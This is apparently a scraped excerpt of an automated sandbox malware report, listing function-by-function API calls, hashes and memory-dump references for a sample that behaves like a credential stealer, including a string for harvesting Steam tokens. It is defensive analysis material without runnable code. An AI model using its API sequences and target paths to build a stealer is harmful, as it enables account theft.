                                                                                                                                                                                                              • Instruction ID: 9e24264368fe79260fb13d2e1631ed65b6b557d418fa0c86767f197bcb3d913d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d314b1bb62d002f64a310dae09a89404a44ca071c875ad9a0886fcf5568eb661
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6B1E63690012DABCF10FBA5EE43BDDB774AF94300F510121F944B7166EA64AE5A8F91
                                                                                                                                                                                                              Function 00927B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00927C56,?), ref: 00927B8A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 544645111-3916222277
                                                                                                                                                                                                              • Opcode ID: 4eb46a39dea1c8c2eee9b78df2818a5147af34d4e492d5d028e85fbe0b3e6e8d
                                                                                                                                                                                                              • Instruction ID: 9ab3f7faee1537158f3ddfd21f3abd7a56ebf163281439110a2a93a7e28d3681
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4eb46a39dea1c8c2eee9b78df2818a5147af34d4e492d5d028e85fbe0b3e6e8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF11A07250812AEBDB20CFE4E684BA9F7E8FB04384F644855D641F3284D778EE84DB60
                                                                                                                                                                                                              Function 00936372 Relevance: 3.1, APIs: 2, Instructions: 101stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 009363BA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 009363D8
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093605A
                                                                                                                                                                                                                • Part of subcall function 00936013: FindFirstFileA.KERNEL32(?,?), ref: 00936071
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956ABC), ref: 00936092
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956AC0), ref: 009360AC
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 009360D3
                                                                                                                                                                                                                • Part of subcall function 00936013: StrCmpCA.SHLWAPI(?,00956647), ref: 009360E7
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 00936104
                                                                                                                                                                                                                • Part of subcall function 00936013: PathMatchSpecA.SHLWAPI(?,?), ref: 00936131
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?), ref: 00936167
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956AD8), ref: 00936179
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 0093618C
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,00956ADC), ref: 0093619E
                                                                                                                                                                                                                • Part of subcall function 00936013: lstrcatA.KERNEL32(?,?), ref: 009361B2
                                                                                                                                                                                                                • Part of subcall function 00936013: wsprintfA.USER32 ref: 0093611B
                                                                                                                                                                                                                • Part of subcall function 00936013: CopyFileA.KERNEL32(?,?,00000001), ref: 0093626B
                                                                                                                                                                                                                • Part of subcall function 00936013: DeleteFileA.KERNEL32(?), ref: 009362DF
                                                                                                                                                                                                                • Part of subcall function 00936013: FindNextFileA.KERNEL32(?,?), ref: 00936341
                                                                                                                                                                                                                • Part of subcall function 00936013: FindClose.KERNEL32(?), ref: 00936355
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                                                                                              • Opcode ID: 8337d34e0ff47cfe10a2b2516f5f637645a2c03d3a1dc5deed0861c4243a58de
                                                                                                                                                                                                              • Instruction ID: 9409a920fc964112a7f3f24999c7d8edc5ca8dfe3ef380103f7ac59be36985f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8337d34e0ff47cfe10a2b2516f5f637645a2c03d3a1dc5deed0861c4243a58de
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C931A17680011DAFDF16EB60DC03EE877B9EF98304F440499BA08A7261DE719AE59F52
                                                                                                                                                                                                              Function 00937143 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0093718A
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Soft\Steam\steam_tokens.txt, xrefs: 0093719A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                              • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                              • API String ID: 502913869-3507145866
                                                                                                                                                                                                              • Opcode ID: 3e28f3bfe2a8ffaac1d7de4c759c88c4ff2baaa27efa4497022339b86a71d66b
                                                                                                                                                                                                              • Instruction ID: ca04c426250bfd3832b7ff428657ebe2628fd69632b3c6254b5172ac2256dd0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e28f3bfe2a8ffaac1d7de4c759c88c4ff2baaa27efa4497022339b86a71d66b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A901FF36D40119ABCF00FBE5ED47ACEBB78AEC4354F504261FA4073126DB316A598BD1
                                                                                                                                                                                                              Function 009277F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00927C18,?,?), ref: 0092784A
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00927874
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 83520060fa5e5f96387b96e5001363befb87a8ade7d713e13ca1647dd40b8181
                                                                                                                                                                                                              • Instruction ID: ecd17e195d8c27206533f8d9104c2a4a49a83504e7cb6ca71f0b4c86fe6bbe5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83520060fa5e5f96387b96e5001363befb87a8ade7d713e13ca1647dd40b8181
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B11D371A04716ABC724CFF8D9C9BAAF7F8EB44714F24086CE61AE7290D270E940CB14
                                                                                                                                                                                                              Function 0093CD49 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 0093CD5A
                                                                                                                                                                                                                • Part of subcall function 0093BCFD: lstrlenA.KERNEL32(?,0093CD6B,0093CE0D,00000000,06400000,00000003,00000000,0093770B,.exe,00956C64,00956C60,00956C5C,00956C58,00956C54,00956C50,00956C4C), ref: 0093BD2F
                                                                                                                                                                                                                • Part of subcall function 0093BCFD: malloc.MSVCRT ref: 0093BD37
                                                                                                                                                                                                                • Part of subcall function 0093BCFD: lstrcpyA.KERNEL32(00000000,?), ref: 0093BD42
                                                                                                                                                                                                              • malloc.MSVCRT ref: 0093CD97
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2974738957-0
                                                                                                                                                                                                              • Opcode ID: 04803b8001b3e0224828e740c4f21ca98d9c91830676c9d428051e3c7e0b1b81
                                                                                                                                                                                                              • Instruction ID: 958e5be73f6113a64e06eaa92ee62c61040b85f72da51869a99b4affea65ae1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04803b8001b3e0224828e740c4f21ca98d9c91830676c9d428051e3c7e0b1b81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F0BBB65056115BD7206F69DC40A5A7F99FF84760F154131FE28AB281DA30DC008BF1
                                                                                                                                                                                                              Function 0093863A Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c94998f278d7692df20d7d77b90ae872ae90416e4e703413546b9ce3b4dc58d8
                                                                                                                                                                                                              • Instruction ID: 686d540d3ebe72fb2651dc3d1f517854ee719f96fcaf64560fde4d01ee73b805
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c94998f278d7692df20d7d77b90ae872ae90416e4e703413546b9ce3b4dc58d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE515D72811700ABCB617BAD558FBB6B2EDAFF031CF150482F4249A136CF658DA45EA1
                                                                                                                                                                                                              Function 00927BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 41f8d14404522ca40c410f7998c187a20a0e9843a81128e5880fc3af98b65b66
                                                                                                                                                                                                              • Instruction ID: 872e5445fbf217ce6b138df5ed80746e9b8994aebaec63e477d400a2eefbd0ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41f8d14404522ca40c410f7998c187a20a0e9843a81128e5880fc3af98b65b66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE317E719082259FCB16EFA5E8409ADFBB5EFC4310B20456AE450B7359D7308A80CB90
                                                                                                                                                                                                              Function 00931D91 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1699248803-0
                                                                                                                                                                                                              • Opcode ID: 4609fed75f59289ff43c1c495adf769849c51ecfc08e7afaa7317292013af443
                                                                                                                                                                                                              • Instruction ID: d7d1165fe034a70e92e76ee3cfa2643edc86c44595efdae3a438571d07c3de64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4609fed75f59289ff43c1c495adf769849c51ecfc08e7afaa7317292013af443
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48F05471E1015DABDB15DF78DC509AEB7FCEB48200F0045B9B909D3291DA30AF458F90
                                                                                                                                                                                                              Function 00931D67 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: 3cae15df25cb0549afcff12d3b35feb1d3e8ccbcebe7f1b33a702474f7cdddde
                                                                                                                                                                                                              • Instruction ID: 79699683981e505c8223c5ce944fdcb5c799f00fb1a663af42b31d044ebbd925
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cae15df25cb0549afcff12d3b35feb1d3e8ccbcebe7f1b33a702474f7cdddde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD05E31200038674A1416A8EC0469ABB0CDF067B4F000722F979960F1C7209D928BC0
                                                                                                                                                                                                              Function 00932516 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 0093254C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileOperation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3080627654-0
                                                                                                                                                                                                              • Opcode ID: 72b8bc8e5316d4b0ba498332dec0dff1e5118f265368b892a0d6dbac2169f5b1
                                                                                                                                                                                                              • Instruction ID: 93be8fde747fa0bf16d5e98ecd23063ea4bdf796c316a68e7fde8a69a2a24c51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72b8bc8e5316d4b0ba498332dec0dff1e5118f265368b892a0d6dbac2169f5b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9E075B0D0830D9FCB44EFA595052DEBAF4AB48309F404069C515F3240E3B496498BA5
                                                                                                                                                                                                              Function 0093C4BE Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
